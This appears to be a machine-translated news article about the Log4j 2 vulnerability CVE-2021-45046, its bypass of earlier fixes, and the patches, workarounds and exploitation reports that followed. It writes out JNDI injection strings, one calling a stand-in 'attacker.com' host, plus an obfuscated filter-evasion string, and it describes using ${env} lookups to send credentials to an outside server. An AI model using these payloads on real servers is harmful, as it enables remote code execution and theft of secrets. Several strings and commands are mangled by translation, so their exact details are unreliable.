The news was released recently that it was identified another vulnerability in JNDI lookup implementation in the Log4j 2 library (CVE-2021-45046), which occurs despite the fixes added in version 2.15 and regardless of the use of the "log4j2.noFormatMsgLookup" protection setting.
The problem it is notably dangerous mainly for older versions of Log4j 2, protected with the "noFormatMsgLookup" flag, as it allows you to bypass protection against past vulnerabilities (Log4Shell, CVE-2021-44228), which allows you to run your code on the server.
For version 2.15 users, the operation is limited to creating conditions for the abnormal termination of the application due to exhaustion of available resources.
Vulnerability only affects systems that use context search, such as $ {ctx: loginId}, or Thread Context Map (MDC) templates, such as% X,% mdc, and% MDC, for registration.
The operation boils down to creating conditions to send data containing JNDI substitutions to the registry when using context queries or MDC templates in the application, which determine the rules for formatting the output to the registry.
The LunaSec researchers noted than for Log4j versions lower than 2.15, this vulnerability can be used as a new vector for a Log4Shell attack, leading to code execution if ThreadContext expressions are used when posting to the registry, which includes external data, regardless of whether the flag is set for protection. "NoMsgFormatLookups" or "% m {nolookups}" template.
The protection bypass is reduced to the fact that instead of the direct substitution "$ {jndi: ldap: //example.com/a}", this expression is substituted for the value of an intermediate variable used in the rules to format check out the register.
For example, if the context request $ {ctx: apiversion} is used when sending to the registry, the attack can be carried out by substituting the data "$ {jndi: ldap: //attacker.com/a}" in the value written to deviation variable.
In version Log4j 2.15, the vulnerability can be used to perform DoS attacks when passing values to the ThreadContext, which loops through the output format pattern processing.
To be able to try to solve the problems encountered updates 2.16 and 2.12.2 have been released to block the vulnerability. In the Log4j 2.16 branch, in addition to the fixes implemented in version 2.15 and the binding of JNDI LDAP requests to "localhost", by default the JNDI functionality is completely disabled and support for message substitution templates has been removed.
As a workaround, it is suggested to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core - *. Jar org /apache/logging/log4j/core/lookup/JndiLookup.class").
As for the actions taken by the different projects:
For NginxBased on the njs module, a script has been prepared that blocks the transmission of JNDI expressions in HTTP headers, URIs and the body of POST requests. The script can be used on frontend servers to protect backends.
For HAProxy, configuration rules are provided to block the operation of CVE-2021-44228.
In addition to the previously identified attacks targeting the formation of a botnet for cryptocurrency mining, there were made exploiting a vulnerability in Log4J 2 to spread malicious ransomware encrypting the contents of the disks and requiring a ransom for decryption .
Checkpoint has identified around 60 variants different types of exploits used for attacks.
CloudFlare reported that attempts to test the manifestation of a vulnerability in Log4j they were identified on December 1, that is, 8 days before the public disclosure of the problem. The first attempts to exploit the vulnerability were recorded only 9 minutes after the information was disclosed. The CloudFlare report also mentions the use of substitutions such as "$ {env: FOO: -j} ndi: $ {lower: L} gives $ {lower: P}" to omit the mask "jndi: ldap" and the use of $ {env} attack expressions to transfer information about passwords and access keys stored in environment variables to an external server, and $ {sys} expressions to collect information about the system.
Finally if you are interested in knowing more about it you can check the following link